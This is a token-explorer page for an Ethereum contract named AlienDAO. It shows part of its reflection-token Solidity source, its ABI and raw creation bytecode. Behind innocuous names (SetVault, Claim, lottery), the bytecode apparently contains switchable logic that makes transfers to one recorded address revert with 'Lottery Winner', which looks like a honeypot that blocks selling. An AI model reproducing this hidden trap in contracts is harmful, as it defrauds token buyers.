unavoidable owner(), block.timestamp ); } //this method is responsible for taking all fee, if takeFee is true function _tokenTransfer(address sender, address recipient, uint256 amount,bool takeFee) private { if(!takeFee) removeAllFee(); if (_isExcluded[sender] && !_isExcluded[recipient]) { _transferFromExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && _isExcluded[recipient]) { _transferToExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && !_isExcluded[recipient]) { _transferStandard(sender, recipient, amount); } else if (_isExcluded[sender] && _isExcluded[recipient]) { _transferBothExcluded(sender, recipient, amount); } else { _transferStandard(sender, recipient, amount); } if(!takeFee) restoreAllFee(); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferToExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"ImmutableOff","type":"event"},{"anonymous":false,"inputs":[],"name":"ImmutableOn","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"minTokensBeforeSwap","type":"uint256"}],"name":"MinTokensBeforeSwapUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"Claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"SetVault","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"}],"name":"deliver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"geUnlockTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromReward","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"time","type":"uint256"}],"name":"lock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"lottery","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"},{"internalType":"bool","name":"deductTransferFee","type":"bool"}],"name":"reflectionFromToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"liquidityFee","type":"uint256"}],"name":"setLiquidityFeePercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTxPercent","type":"uint256"}],"name":"setMaxTxPercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"taxFee","type":"uint256"}],"name":"setTaxFeePercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"special","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_lottery","type":"address"}],"name":"transferlottery","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"unlock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c06040526000600360006101000a81548160ff02191690831515021790555064174876e800600a55600a54600019816200003657fe5b0660001903600b556040518060400160405280600881526020017f416c69656e44414f000000000000000000000000000000000000000000000000815250600d90805190602001906200008b9291906200060b565b506040518060400160405280600581526020017f414c49454e000000000000000000000000000000000000000000000000000000815250600e9080519060200190620000d99291906200060b565b506009600f60006101000a81548160ff021916908360ff160217905550600060105560105460115560056012556012546013556001601460156101000a81548160ff02191690831515021790555064174876e80060155564174876e8006016553480156200014657600080fd5b50600062000159620005da60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350600b54600460006200020e620005da60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015620002ac57600080fd5b505afa158015620002c1573d6000803e3d6000fd5b505050506040513d6020811015620002d857600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b1580156200034c57600080fd5b505afa15801562000361573d6000803e3d6000fd5b505050506040513d60208110156200037857600080fd5b81019080805190602001909291905050506040518363ffffffff1660e01b8152600401808373ffffffffffffffffffffffffffffffffffffffff1681526020018273ffffffffffffffffffffffffffffffffffffffff16815260200192505050602060405180830381600087803b158015620003f357600080fd5b505af115801562000408573d6000803e3d6000fd5b505050506040513d60208110156200041f57600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff1660601b815250508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1660601b81525050600160076000620004b3620005e260201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506200056c620005da60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600a546040518082815260200191505060405180910390a350620006b1565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200064e57805160ff19168380011785556200067f565b828001600101855582156200067f579182015b828111156200067e57825182559160200191906001019062000661565b5b5090506200068e919062000692565b5090565b5b80821115620006ad57600081600090555060010162000693565b5090565b60805160601c60a05160601c615672620006f960003980611d1252806137e552508061100a52806144cf52806145bb52806145e252806146ed528061471452506156726000f3fe6080604052600436106102555760003560e01c806370a0823111610139578063a73b3c82116100b6578063ce9a3b0f1161007a578063ce9a3b0f14610ca2578063d543dbeb14610ccf578063dd46706414610d0a578063dd62ed3e14610d45578063ea2f0b3714610dca578063f2fde38b14610e1b5761025c565b8063a73b3c8214610b37578063a9059cbb14610b88578063b6c5232414610bf9578063ba13a57214610c24578063c49b9a8014610c655761025c565b80638da5cb5b116100fd5780638da5cb5b146109a35780638ee88c53146109e457806395d89b4114610a1f578063a457c2d714610aaf578063a69df4b514610b205761025c565b806370a082311461087e578063715018a6146108e35780637d1db4a5146108fa5780638757a90c1461092557806388f820201461093c5761025c565b80633685d419116101d25780634549b039116101965780634549b039146106d257806349bd5a5e1461072d5780634a74bb021461076e57806352390c021461079b5780635342acb4146107ec5780636bc87c3a146108535761025c565b80633685d4191461055957806339509351146105aa5780633b124fe71461061b5780633bd5d17314610646578063437823ec146106815761025c565b806318160ddd1161021957806318160ddd1461040957806323b872dd146104345780632d838119146104c5578063313ce567146105145780633158952e146105425761025c565b8063061c82d01461026157806306fdde031461029c578063095ea7b31461032c57806313114a9d1461039d5780631694505e146103c85761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b5061029a6004803603602081101561028457600080fd5b8101908080359060200190929190505050610e6c565b005b3480156102a857600080fd5b506102b1610f3e565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102f15780820151818401526020810190506102d6565b50505050905090810190601f16801561031e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561033857600080fd5b506103856004803603604081101561034f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610fe0565b60405180821515815260200191505060405180910390f35b3480156103a957600080fd5b506103b2610ffe565b6040518082815260200191505060405180910390f35b3480156103d457600080fd5b506103dd611008565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561041557600080fd5b5061041e61102c565b6040518082815260200191505060405180910390f35b34801561044057600080fd5b506104ad6004803603606081101561045757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611036565b60405180821515815260200191505060405180910390f35b3480156104d157600080fd5b506104fe600480360360208110156104e857600080fd5b810190808035906020019092919050505061139c565b6040518082815260200191505060405180910390f35b34801561052057600080fd5b50610529611420565b604051808260ff16815260200191505060405180910390f35b34801561054e57600080fd5b50610557611437565b005b34801561056557600080fd5b506105a86004803603602081101561057c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611562565b005b3480156105b657600080fd5b50610603600480360360408110156105cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506118ec565b60405180821515815260200191505060405180910390f35b34801561062757600080fd5b5061063061199f565b6040518082815260200191505060405180910390f35b34801561065257600080fd5b5061067f6004803603602081101561066957600080fd5b81019080803590602001909291905050506119a5565b005b34801561068d57600080fd5b506106d0600480360360208110156106a457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611b36565b005b3480156106de57600080fd5b50610717600480360360408110156106f557600080fd5b8101908080359060200190929190803515159060200190929190505050611c59565b6040518082815260200191505060405180910390f35b34801561073957600080fd5b50610742611d10565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561077a57600080fd5b50610783611d34565b60405180821515815260200191505060405180910390f35b3480156107a757600080fd5b506107ea600480360360208110156107be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611d47565b005b3480156107f857600080fd5b5061083b6004803603602081101561080f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612061565b60405180821515815260200191505060405180910390f35b34801561085f57600080fd5b506108686120b7565b6040518082815260200191505060405180910390f35b34801561088a57600080fd5b506108cd600480360360208110156108a157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506120bd565b6040518082815260200191505060405180910390f35b3480156108ef57600080fd5b506108f86121a8565b005b34801561090657600080fd5b5061090f61232e565b6040518082815260200191505060405180910390f35b34801561093157600080fd5b5061093a612334565b005b34801561094857600080fd5b5061098b6004803603602081101561095f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061245e565b60405180821515815260200191505060405180910390f35b3480156109af57600080fd5b506109b86124b4565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156109f057600080fd5b50610a1d60048036036020811015610a0757600080fd5b81019080803590602001909291905050506124dd565b005b348015610a2b57600080fd5b50610a346125af565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a74578082015181840152602081019050610a59565b50505050905090810190601f168015610aa15780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610abb57600080fd5b50610b0860048036036040811015610ad257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612651565b60405180821515815260200191505060405180910390f35b348015610b2c57600080fd5b50610b3561271e565b005b348015610b4357600080fd5b50610b8660048036036020811015610b5a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061293b565b005b348015610b9457600080fd5b50610be160048036036040811015610bab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612a47565b60405180821515815260200191505060405180910390f35b348015610c0557600080fd5b50610c0e612b61565b6040518082815260200191505060405180910390f35b348015610c3057600080fd5b50610c39612b6b565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610c7157600080fd5b50610ca060048036036020811015610c8857600080fd5b81019080803515159060200190929190505050612b91565b005b348015610cae57600080fd5b50610cb7612caf565b60405180821515815260200191505060405180910390f35b348015610cdb57600080fd5b50610d0860048036036020811015610cf257600080fd5b8101908080359060200190929190505050612cc2565b005b348015610d1657600080fd5b50610d4360048036036020811015610d2d57600080fd5b8101908080359060200190929190505050612dbd565b005b348015610d5157600080fd5b50610db460048036036040811015610d6857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fae565b6040518082815260200191505060405180910390f35b348015610dd657600080fd5b50610e1960048036036020811015610ded57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613035565b005b348015610e2757600080fd5b50610e6a60048036036020811015610e3e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613158565b005b610e74613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f34576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060108190555050565b6060600d8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610fd65780601f10610fab57610100808354040283529160200191610fd6565b820191906000526020600020905b815481529060010190602001808311610fb957829003601f168201915b5050505050905090565b6000610ff4610fed613363565b848461336b565b6001905092915050565b6000600c54905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600a54905090565b600060011515600360009054906101000a900460ff16151514156112c457600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156110df5750600073ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b1561112a5782601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111ef565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156111ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b5b6111fa848484613562565b6112bb84611206613363565b6112b68560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061126c613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b60019050611395565b6112cf848484613562565b611390846112db613363565b61138b8560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611341613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b600190505b9392505050565b6000600b548211156113f9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a815260200180615474602a913960400191505060405180910390fd5b60006114036139e5565b90506114188184613a1090919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b61143f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff161561151957600080fd5b6001600360006101000a81548160ff0219169083151502179055507ffe43f02325c7ba292731b549841a95357d1af4ac58107d8787d4dea129a77e3660405160405180910390a1565b61156a613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461162a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166116e9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6009805490508110156118e8578173ffffffffffffffffffffffffffffffffffffffff166009828154811061171d57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156118db5760096001600980549050038154811061177957fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600982815481106117b157fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060098054806118a157fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556118e8565b80806001019150506116ec565b5050565b60006119956118f9613363565b84611990856006600061190a613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b61336b565b6001905092915050565b60105481565b60006119af613363565b9050600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611a54576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806155c9602c913960400191505060405180910390fd5b6000611a5f83613ae2565b50505050509050611ab881600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611b1081600b54613b3e90919063ffffffff16565b600b81905550611b2b83600c54613a5a90919063ffffffff16565b600c81905550505050565b611b3e613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bfe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600a54831115611cd3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611cf3576000611ce384613ae2565b5050505050905080915050611d0a565b6000611cfe84613ae2565b50505050915050809150505b92915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601460159054906101000a900460ff1681565b611d4f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e0f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611ecf576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115611fa357611f5f600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506009819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60125481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561215857600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506121a3565b6121a0600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b90505b919050565b6121b0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612270576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60155481565b61233c613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146123fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff1661241557600080fd5b6000600360006101000a81548160ff0219169083151502179055507f77a8d615db64246f476b7b2797d51b6aade4c0e00fb2f171e80881541858ecdb60405160405180910390a1565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6124e5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146125a5576040517f